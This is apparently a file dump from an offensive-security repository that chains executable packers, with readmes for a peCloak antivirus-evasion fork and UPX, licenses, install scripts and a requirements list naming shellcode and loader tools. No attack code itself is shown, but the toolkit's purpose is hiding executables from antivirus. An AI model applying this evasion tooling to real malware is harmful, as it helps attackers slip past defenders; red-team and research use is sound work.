4 | This is a simple fork of [SecuritySift's peCloak](http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/) that uses [Capstone](http://www.capstone-engine.org). The intention is to provide a fork based on a well-maintained, up-to-date disassembly library and to make the script multi-platform.
5 |
6 | Here's what I did so far:
7 | * Replaced pydasm with Capstone
8 | * Included a patched version of [SectionDoubleP](http://git.n0p.cc/?p=SectionDoubleP.git;a=summary) as it also relied on pydasm
9 | * Made data (un)packing platform independent by always using standard sizes
10 |
11 | This way I managed to create obfuscated 32-bit Windows executables on 64-bit Linux which is nice :)
12 |
13 | Still, this is just a quick hack, bugs most probably hide here and there and I probably left some dead code too.
14 |
--------------------------------------------------------------------------------
/contrib/peCloakCapstone/SectionDoubleP.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/peCloakCapstone/SectionDoubleP.pyc
--------------------------------------------------------------------------------
/contrib/pe_tools/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Permission is hereby granted, free of charge, to any person obtaining a copy
4 | of this software and associated documentation files (the "Software"), to deal
5 | in the Software without restriction, including without limitation the rights
6 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
7 | copies of the Software, and to permit persons to whom the Software is
8 | furnished to do so, subject to the following conditions:
9 |
10 | The above copyright notice and this permission notice shall be included in all
11 | copies or substantial portions of the Software.
12 |
13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
19 | SOFTWARE.
20 |
--------------------------------------------------------------------------------
/contrib/pe_tools/VERSION:
--------------------------------------------------------------------------------
1 | 0.3
--------------------------------------------------------------------------------
/contrib/pe_tools/pe_tools/__init__.py:
--------------------------------------------------------------------------------
1 | from .pe_parser import *
2 | from .rsrc import *
3 | from .version_info import parse_version_info
4 |
--------------------------------------------------------------------------------
/contrib/pe_tools/pe_tools/__pycache__/peresed.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe_tools/pe_tools/__pycache__/peresed.cpython-310.pyc
--------------------------------------------------------------------------------
/contrib/pe_tools/pe_tools/utils.py:
--------------------------------------------------------------------------------
1 | def align4(val):
2 | return (val + 3) & ~3
3 |
4 | def align8(val):
5 | return (val + 7) & ~7
6 |
7 | def align16(val):
8 | return (val + 15) & ~15
9 |
--------------------------------------------------------------------------------
/contrib/pe_tools/setup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from setuptools import setup
5 | import os
6 |
7 | top, _ = os.path.split(__file__)
8 | with open(os.path.join(top, 'VERSION'), 'r') as fin:
9 | version = fin.read().strip() + '+local'
10 | version = '{version}'.format(version=version)
11 |
12 | setup(
13 | name='pe_tools',
14 | version=version,
15 |
16 | url='https://github.com/avast/pe_tools',
17 | maintainer='Martin Vejnár',
18 | maintainer_email='martin.vejnar@avast.com',
19 |
20 | packages=['pe_tools'],
21 | install_requires=['grope'],
22 |
23 | entry_points={
24 | 'console_scripts': [
25 | 'peresed = pe_tools.peresed:main',
26 | ],
27 | }
28 | )
29 |
--------------------------------------------------------------------------------
/contrib/sRDI/Python.pyproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Debug
5 | 2.0
6 | be642266-f34d-43c3-b6e4-eebf8e489519
7 |
8 |
9 |
10 |
11 |
12 |
13 | .
14 | .
15 | Python
16 | RDIShellcodePyLoader
17 |
18 |
19 | true
20 | false
21 |
22 |
23 | true
24 | false
25 |
26 |
27 | 10.0
28 |
29 |
30 |
31 |
32 |
33 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
--------------------------------------------------------------------------------
/contrib/sgn/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Ege Balcı
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/contrib/sgn/keystone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/sgn/keystone.dll
--------------------------------------------------------------------------------
/contrib/sgn/sgn.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/sgn/sgn.exe
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-amd64_linux/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-amd64_linux/upx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-amd64_linux/upx
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-i386_linux/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-i386_linux/upx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-i386_linux/upx
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win32/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win32/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-win32/upx.exe
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win64/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win64/THANKS:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | .___.. .
16 | | |_ _.._ ;_/ __
17 | | [ )(_][ )| \_)
18 | --------------------
19 |
20 | UPX would not be what it is today without the invaluable help of
21 | everybody who was kind enough to spend time testing it, using it
22 | in applications and reporting bugs.
23 |
24 | The following people made especially gracious contributions of their
25 | time and energy in helping to track down bugs, add new features, and
26 | generally assist in the UPX maintainership process:
27 |
28 | Adam Ierymenko
29 | for severals ideas for the Linux version
30 | Andi Kleen and Jamie Lokier
31 | for the /proc/self/fd/X and other Linux suggestions
32 | Andreas Muegge
33 | for the Win32 GUI
34 | Atli Mar Gudmundsson
35 | for several comments on the win32/pe stub
36 | Charles W. Sandmann
37 | for the idea with the stubless decompressor in djgpp2/coff
38 | Ice
39 | for debugging the PE headersize problem down
40 | Joergen Ibsen and d'b
41 | for the relocation & address optimization ideas
42 | John S. Fine
43 | for the new version of the dos/exe decompressor
44 | Lukundoo
45 | for beta testing
46 | Michael Devore
47 | for initial dos/exe device driver support
48 | Oleg V. Volkov
49 | for various FreeBSD specific informations
50 | The Owl & G-RoM
51 | for the --compress-icons fix
52 | Ralph Roth
53 | for reporting several bugs
54 | Salvador Eduardo Tropea
55 | for beta testing
56 | Stefan Widmann
57 | for the win32/pe TLS callback support
58 | The WINE project (http://www.winehq.com/)
59 | for lots of useful information found in their PE loader sources
60 | Natascha
61 |
62 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win64/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-win64/upx.exe
--------------------------------------------------------------------------------
/images/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/1.png
--------------------------------------------------------------------------------
/images/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/3.png
--------------------------------------------------------------------------------
/images/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/4.png
--------------------------------------------------------------------------------
/images/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/5.png
--------------------------------------------------------------------------------
/images/options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/options.png
--------------------------------------------------------------------------------
/install.ps1:
--------------------------------------------------------------------------------
1 |
2 | Write-Host "`n== Step 1: Installing pip3 dependencies...`n" -ForegroundColor cyan
3 | pip3 install -r requirements.txt
4 |
5 | if ((Get-Command "python2" -ErrorAction SilentlyContinue) -eq $null)
6 | {
7 | Write-Host "`nWARNING: Some packers work only on Python2 which you seem to not have installed. Consider installing it to use: peCloakCapstone`n" -ForegroundColor yellow
8 | }
9 |
10 | if ((Get-Command "nim.exe" -ErrorAction SilentlyContinue) -eq $null)
11 | {
12 | Write-Host "`nERROR: For Nim-related packers to work, you need to install Nim on your Windows! Consider using Chocolatey manager: choco install nim -y`n" -ForegroundColor green
13 | }
14 | else
15 | {
16 | Write-Host "`n== Step 2a: Installs nim dependencies...`n" -ForegroundColor cyan
17 | nimble -y install winim nimcrypto docopt ptr_math strenc
18 |
19 | Write-Host "`n== Step 2b: Installs denim.exe (github.com/moloch--/denim) dependencies...`n" -ForegroundColor cyan
20 | .\contrib\denim\denim.exe setup
21 | }
22 |
23 | if ((Get-Command "bash.exe" -ErrorAction SilentlyContinue) -eq $null)
24 | {
25 | Write-Host "`nWARNING: You don't seem to have Bash.exe in your Windows (no WSL installed?). Some linux-native packers might not work: ScareCrow`n" -ForegroundColor green
26 | }
27 | else
28 | {
29 | Write-Host "`n`n== Step 3: Installing Linux dependencies (via WSL bash.exe). You'll be asked for sudo password...`n`n" -ForegroundColor cyan
30 | bash.exe -c "sudo apt install -y dos2unix ; dos2unix install.sh"
31 | bash.exe install.sh
32 | }
33 |
34 | Write-Host "`n`nOK: You should be all set now.`n"
35 | Write-Host "`nEnjoy ProtectMyTooling - and let me know the coolest/most effective packers-chain you come up with! :-)`n" -ForegroundColor green
36 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | sudo apt update
4 |
5 | sudo apt upgrade -y
6 |
7 | sudo apt install python3 python3-dev nim=1.6.2 mingw-64=8.0.0-1 golang=2:1.18~3 -y
8 |
9 | pip3 install -r requirements.txt
10 |
11 | nimble install nimcrypto docopt ptr_math strenc winim
12 |
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/lib/__init__.py
--------------------------------------------------------------------------------
/packers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/packers/__init__.py
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pyyaml
2 | pefile
3 | capstone
4 | pythonnet==3.0.0a2
5 | pe_tools
6 | capstone
7 | keystone-engine
8 | pycryptodome
9 | argparse
10 | PrettyTable
11 | PySimpleGUI
12 | clipboard
13 | colorama
14 | yara-python
15 | donut-shellcode
16 |
--------------------------------------------------------------------------------